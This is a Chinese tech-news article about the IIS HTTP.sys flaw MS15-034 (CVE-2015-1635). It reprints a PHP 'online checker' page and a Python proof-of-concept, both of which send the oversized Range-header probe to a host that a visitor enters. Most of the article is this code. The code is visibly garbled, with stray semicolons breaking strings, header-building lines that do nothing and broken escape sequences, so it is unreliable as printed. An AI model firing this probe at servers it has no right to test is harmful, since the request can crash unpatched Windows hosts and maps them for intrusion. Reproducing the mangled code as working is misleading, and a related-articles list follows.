51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

IIS最新高危漏洞POC及在线检测源码

作者:xiaoya
安全 漏洞
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

IIS最新高危漏洞POC及在线检测源码

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS15-034

在线检测源码

IIS最新高危漏洞POC及在线检测源码 

  1. <?php 
  2.  
  3.  
  4. class VulnStatus  
  5. {  
  6. const FAIL        = 0;  
  7. const VULN        = 1;  
  8. const VULN_NOT_MS = 2;  
  9. const PATCHED     = 3;  
  10. const NOT_VULN    = 4;  
  11. const NOT_VULN_MS = 5;  
  12. const NOT_VULN_CF = 6;  
  13.  
  14. public static function AsString( $status, $host )  
  15. {  
  16. switch( $status )  
  17. {  
  18. case self::FAIL       : return ';<div class="alert alert-warning">无法连接到 <b>'; . $host . ';</b> 测试漏洞。</div>';;  
  19. case self::VULN       : return ';<div class="alert alert-danger"><b>'; . $host . ';</b> 存在漏洞。</div>';;  
  20. case self::VULN_NOT_MS: return ';<div class="alert alert-warning"><b>'; . $host . ';</b> 可能存在漏洞,但它好像没使用IIS。</div>';;  
  21. case self::PATCHED    : return ';<div class="alert alert-success"><b>'; . $host . ';</b> 已修复。</div>';;  
  22. case self::NOT_VULN   : return ';<div class="alert alert-info">不能识别补丁状态 <b>'; . $host . ';</b>, 并没有使用IIS,可能不存在漏洞。</div>';;  
  23. case self::NOT_VULN_MS: return ';<div class="alert alert-info">不能识别补丁状态 <b>'; . $host . ';</b>. 可能不存在漏洞。</div>';;  
  24. case self::NOT_VULN_CF: return ';<div class="alert alert-success"><b>'; . $host . ';</b> 可能使用了CloudFlare CDN加速,导致漏洞无法检测或不存在。</div>';;  
  25. }  
  26.  
  27. return ';好像坏了';;  
  28. }  
  29. }  
  30.  
  31. $host = false;  
  32. $status = false;  
  33. $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL );  
  34.  
  35. if( !empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null )  
  36. {  
  37. $url = ';http://'; . $url;  
  38. }  
  39.  
  40. $port = parse_url( $url, PHP_URL_PORT );  
  41.  
  42. if( $port === null )  
  43. {  
  44. $port = 80;  
  45. }  
  46.  
  47. $url = parse_url( $url, PHP_URL_HOST );  
  48.  
  49. if( $url !== null )  
  50. {  
  51. $cachekey = ';ms15034_'; . $url . ';_'; . $port;  
  52. $cachetime = 300; // 5 minutes  
  53.  
  54. $host = htmlspecialchars( $url, ENT_HTML5 );  
  55.  
  56. if( $port !== 80 )  
  57. {  
  58. $host .';:'; . $port;  
  59. }  
  60.  
  61. $memcached = new Memcached( );  
  62. $memcached->addServer( ';/var/run/memcached/memcached.sock';, 0 );  
  63.  
  64. $status = $memcached->get( $cachekey );  
  65.  
  66. if( $status === false )  
  67. {  
  68. $fp = @fsockopen( $url, $port, $errno, $errstr, 5 );  
  69.  
  70. if( $fp === false )  
  71. {  
  72. $status = VulnStatus::FAIL;  
  73. }  
  74. else  
  75. {  
  76. stream_set_timeout( $fp, 5 );  
  77.  
  78. $header = "GET / HTTP/1.1\r\n";  
  79. $header ."Host: stuff\r\n";  
  80. $header ."Range: bytes=0-18446744073709551615\r\n";  
  81. $header ."Connection: close\r\n\r\n";  
  82.  
  83. fwrite( $fp, $header );  
  84.  
  85. $response = fread( $fp, 1024 );  
  86.  
  87. fclose( $fp );  
  88.  
  89. if( strpos( $response, ';您的请求范围不符合'; ) !== false )  
  90. {  
  91. $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN;  
  92. }  
  93. else if( strpos( $response, ';请求一个无效的header头部'; ) !== false )  
  94. {  
  95. $cachetime = 3600; // 缓存时间  
  96. $status = VulnStatus::PATCHED;  
  97. }  
  98. else if( strpos( $response, ';Microsoft'; ) === false )  
  99. {  
  100. if( strpos( $response, ';403 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false )  
  101. {  
  102. $status = VulnStatus::NOT_VULN_CF;  
  103. }  
  104. else  
  105. {  
  106. $status = VulnStatus::NOT_VULN;  
  107. }  
  108. }  
  109. else  
  110. {  
  111. $status = VulnStatus::NOT_VULN_MS;  
  112. }  
  113. }  
  114.  
  115. unset( $fp, $header, $response );  
  116.  
  117. $memcached->set( $cachekey, $status, $cachetime );  
  118. }  
  119.  
  120. $status = VulnStatus::AsString( $status, $host );  
  121. }  
  122. ?> 
  123. <!DOCTYPE HTML> 
  124. <html> 
  125. <head> 
  126. <meta charset="utf-8"> 
  127. <meta name="theme-color" content="#424242"> 
  128. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> 
  129. <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  130.  
  131. <title>MS15-034 测试</title> 
  132.  
  133. <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet"> 
  134.  
  135. <style type="text/css"> 
  136. .container {  
  137. max-width: 900px;  
  138. }  
  139.  
  140. .masthead {  
  141. position: relative;  
  142. padding: 20px 0;  
  143. text-align: center;  
  144. color: #fff;  
  145. background-color: #424242;  
  146. margin-bottom: 20px;  
  147. }  
  148.  
  149. .masthead a {  
  150. color: #fff;  
  151. }  
  152.  
  153. .footer {  
  154. text-align: center;  
  155. padding: 15px;  
  156. color: #555;  
  157. }  
  158.  
  159. .footer span {  
  160. color: #FA5994;  
  161. }  
  162.  
  163. .form-inline {  
  164. text-align: center;  
  165. margin-bottom: 20px;  
  166. }  
  167.  
  168. .github {  
  169. position: absolute;  
  170. top: 0;  
  171. right: 0;  
  172. }  
  173. </style> 
  174. </head> 
  175. <body> 
  176. <div> 
  177. <div> 
  178. <h1>HTTP.sys 堆栈漏洞测试</h1> 
  179. <h3>输入一个URL或主机名来测试服务器的 <a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-034</a> / <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2015-1635</a>.</h3> 
  180. </div> 
  181. </div> 
  182.  
  183.  
  184.  
  185. <div> 
  186. <blockquote> 
  187. <p>在HTTP协议栈(HTTP.sys)造成当HTTP协议堆栈不正确地分析特制的HTTP请求的远程代码执行漏洞。成功利用此漏洞谁的攻击者可以在系统帐户的上下文中执行任意代码。</p> 
  188. <p>要利用此漏洞,攻击者必须发送一个特制的HTTP请求发送到受影响的系统。此更新通过修改Windows HTTP协议栈处理请求解决该漏洞。</p> 
  189. </blockquote> 
  190.  
  191. <form id="js-form" method="GET"> 
  192. <div> 
  193. <input type="text" class="form-control input-lg" id="js-input" placeholder="baidu.com" name="host" autofocus<?php if( $host !== false ) { echo '; value="'; . $host . ';"';; } ?>> 
  194. <button type="submit" class="btn btn-primary btn-lg">检测</button> 
  195. </div> 
  196. </form> 
  197.  
  198. <?php if( $status !== false ) { echo $status; } ?> 
  199.  
  200. <div>使用Memcached分布式内存对象缓存系统 | 所有的结果查询会被缓存五分钟</div> 
  201. </div> 
  202. </body> 
  203. </html> 

漏洞验证POC

python版

  1. #!/usr/bin/env python  
  2. __author__ = ';jastra';  
  3. class bg_colors:  
  4.     VULN = ';33[92m';  
  5.     NONVULN= ';33[95m';  
  6.     EXPLOIT = ';33[91m';    
  7. try:  
  8.     import requests  
  9.     import re  
  10. except ImportError as ierr:  
  11.     print(bg_colors.EXPLOIT + "Error, looks like you don';t have %s installed", ierr)  
  12.       
  13. def identify_iis(domain):  
  14.     req = requests.get(str(domain))  
  15.     remote_server = req.headers[';server';]  
  16.           
  17.     if "Microsoft-IIS" in remote_server:  
  18.         print(bg_colors.VULN + "[+] 服务是 " + remote_server)   
  19.         ms15_034_test(str(domain))  
  20.     else:  
  21.         print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)   
  22.           
  23. def ms15_034_test(domain):  
  24.     print(" 启动vuln检查!")  
  25.     vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";  
  26.     req = requests.get(str(domain), params=vuln_buffer)  
  27.     if req.headers[';content';] == "请求范围不符合":  
  28.         print(bg_colors.EXPLOIT + "[+] 存在漏洞")  
  29.     else:  
  30.         print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. "+  
  31.                "需要手动检测")  
  32. usr_domain = raw_input("输入域名扫描: ")  
  33. identify_iis(usr_domain) 

 

责任编辑:蓝雨泪 来源: FreeBuf
IIS漏洞远程执行代码漏洞
相关推荐
详解Facebook最新高危XSS安全漏洞
攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。拜这些高危跨站点脚本攻击漏洞所赐,Facebook用户可能受到钓鱼攻击并导致ID失窃。截至本月5号为止,这些漏洞尚未得到修复,这些高危漏洞已经对用户的隐私构成了高度的威胁。

2009-02-04 11:24:12

OpenSSL最新高危漏洞(CVE-2015-1793)补丁发布
研究人员AdamLangleyDavidBenjamin(GoogleBoringSSL)近日发现了一枚新的OpenSSL严重安全漏洞。目前OpenSSL已发布了OpenSSL1.0.2b和OpenSSL1.0.1n两个版本的最新更新,修复了加密协议中的证书伪造问题。

2015-07-13 09:18:20

Linux 内核最新高危提权漏洞:脏管道 (Dirty Pipe)
来自CM4all的安全研究员MaxKellermann披露了一个Linux内核的高危提权漏洞:脏管道(DirtyPipe)。漏洞编号为CVE20220847。

2022-03-09 13:25:21

脏管道Linux 内核漏洞
最新高危木马“鬼影2”现身
木马的传播方式主要通过EMAIL,控制端将木马程序以附件的形式夹在邮件中发送出去,收信人只要打开附件系统就会感染木马;另一种是通过软件下载,一些非正规的网站以提供软件下载为名义,将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。因此,防范木马是一个比较困难的事情。

2011-03-21 10:46:04

Struts2高危漏洞最新分析
日前,ApacheStruts2发布漏洞公告,称其Struts2Web应用框架存在一个可以远程执行任意命令的高危漏洞。利用该漏洞,黑客可轻易攻陷网站服务器,获取网站注册用户的帐号密码和个人资料,而Struts2框架正广泛应用在国内大量知名网站上,包括各大门户、电商、银行等官网也受其影响。

2013-07-18 15:09:27

PoC代码已公布,这个 VMware auth 高危漏洞需尽快修补
据报道,VMware已在近期发布了安全更新,以解决影响WorkspaceONEAccess、VMwareIdentityManager(vIDM)或vRealizeAutomation的CVE202222972漏洞。

2022-05-27 12:51:46

漏洞VMware攻击者
Android重大漏洞POC
上周,移动安全公司BlueboxSecurity研究人员声称发现了一个Android严重漏洞,这个漏洞允许攻击者修改应用程序的代码但不会改变其加密签名,这个漏洞从Android1.6开始就一直存在于Android中,影响过去4年间发布的99%的Android手机。

2013-07-11 09:25:49

谷歌警告,大量黑客披露最新概念验证(PoC漏洞
该脚本利用GoogleCalendar中的事件描述创建了一个名为MrSaighnal的隐秘通道,该通道可直接连接到谷歌。

2023-11-08 13:34:13

继被曝出史诗级零日漏洞后,微软再公布全新高危漏洞
在疫情肆虐下,Win10的日子也不好过,先是前不久被爆出现了史诗级零日漏洞“永恒之黑”,现在又一漏洞威胁找上门来。

2020-03-25 09:40:57

微软浏览器Windows
ChatGPT 写 PoC,拿下漏洞
我们利用比对的方式验证了ChatGPT的一些安全猜想和训练模型的准确性。如下是将其与Goby实战化网络攻防工具所结合进行利用检测的实现效果

2023-04-07 09:12:11

BrakTooth漏洞利用PoC发布
攻击者利用BrakTooth漏洞可以发起DoS攻击使设备固件奔溃,可以利用死锁条件来拦截蓝牙通信实现任意代码执行,并最终完全接管受影响的设备。

2021-11-10 11:51:33

BrakTooth安全漏洞蓝牙设备
Chrome 17最新版火速来袭 修复高危漏洞
Chrome稳定版已经更新至17.0.963.79,Windows、Mac、Linux三大平台以及ChromeFrame浏览器框架同步更新。该版本主要修复了Flash游戏中的问题,另外还进行了安全更新。

2012-03-12 17:23:45

谷歌披露 GitHub 高危漏洞
谷歌ProjectZero披露了GitHubActions中存在的严重安全漏洞。Actions主要负责与“动作执行器”(ActionRunner)之间的通信工作。这次问题在于,GitHubActions中的工作流命令极易受到注入攻击。

2020-11-04 14:55:06

谷歌GitHub漏洞
DedeCMS高危漏洞威胁40万家网站 360提供检测
港交所网站被黑事件尚未平息,一个影响更为广泛的DedeCMS系统高危漏洞又被黑客捅了出来。公开数据显示,使用DedeCMS系统的国内互联网站接近40万家,覆盖企业、教育机构、数字传媒等各个领域。

2011-08-15 15:41:29

MySQL现高危漏洞,可致服务器root权限被窃取
本周二,Golunski公布了针对两个漏洞的PoC:第一个PoC针对的是之前的高危权限提升漏洞,而另一个PoC针对的则是一个新的root权限提升漏洞,利用这个漏洞,攻击者能够获取到整个数据库的权限。

2016-11-08 19:44:08

美国CISA最新收录五大高危漏洞,需尽快修复!
三星安卓智能手机系统及苹果iOS、iPadOS、macOS和Safari网络浏览器等均受到波及。

2023-04-12 21:28:40

JWPlayer 5最新SWF XSS 0day分析POC改进
4月16号,国外公布了jwplayer一个未修复的XSS0day。jwplayer是全球范围内目前应用最广泛的flash播放组件,特别是国外众多在线爱情动作片网站。此前jwplayer曾爆出过一个XSS漏洞,影响非常广泛。

2013-04-17 10:01:52

jwplayerXSS漏洞
一周安全要闻:IIS高危漏洞 APT黑客组织互掐
上周,微软公告MS15034IIS7http.sys漏洞,引来业界的关注,其震荡性不亚于Windows领域的心脏出血事件。据悉,全球部署IIS的系统数量大概有444万余,从目前受影响的IIS各版本分布统计数据来看,其中IIS7.5部署量最大,占比42.3%,也是本次追踪分析的重点。本周安全要闻将带您详细了解相关信息。

2015-04-20 00:01:48

社保系统疑存高危漏洞
据报道,上海、山西、河南等30省市卫生和社保系统出现大量高危漏洞,上千万的社保用户信息遭泄露。只需一个身份证号码,便可以利用广东省社会保险基金管理局网站的安全漏洞,得到参保人的相关资料和账户信息。

2015-04-22 16:06:23

社保信息泄漏
Microsoft Exchange ProxyLogon PoC漏洞利用公布
近几周来,微软检测到多个利用0day漏洞利用来攻击微软Exchange服务器的攻击活动。其中,利用的是微软Exchange服务器中的ProxyLogon漏洞,CVE编号为CVE202126855,攻击者利用该漏洞可以绕过认证方式和冒充其他用户。

2021-03-15 09:26:33

漏洞微软攻击
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服